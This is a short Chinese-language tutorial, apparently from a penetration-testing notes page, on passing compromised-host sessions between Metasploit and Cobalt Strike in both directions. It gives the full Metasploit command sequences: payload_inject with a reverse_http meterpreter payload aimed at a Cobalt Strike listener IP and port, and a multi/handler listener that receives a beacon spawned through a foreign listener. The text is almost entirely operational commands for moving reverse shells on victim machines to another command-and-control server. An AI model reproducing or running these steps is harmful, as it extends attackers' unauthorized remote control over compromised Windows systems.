msf派生shell给cobalstrike(必须有一个meterpreter)
首先在cobalstrike中添加监听器
回到msf中使用 exploit/windows/local/payload_inject 模块,后设置相关选项
set payload windows/meterpreter/reverse_http #必须与cobalstrike中设置的payload相同
set lhost 192.168.0.136 #cobalstrike的ip地址
set lport 777 #cobalstrike监听的端口
set disablepayloadhandler true #告诉MSF说我们已经建立了监听器,不必再新建监听器
run #运行
查看cobalstrike中获得了一个shell
Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)
在msf使用监听模块。并设置相关选项
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.136
set lport 9999
run -j
回到cobalstrike中添加监听器 payload为windows/foreign/reverse_http ip为msf的ip 监听端口为msf监听的端口
下图为刚创建的监听器
选中要派生的shell 右击spawn 选择刚刚创建的监听器
即可看到msf中获取到了meterpreter会话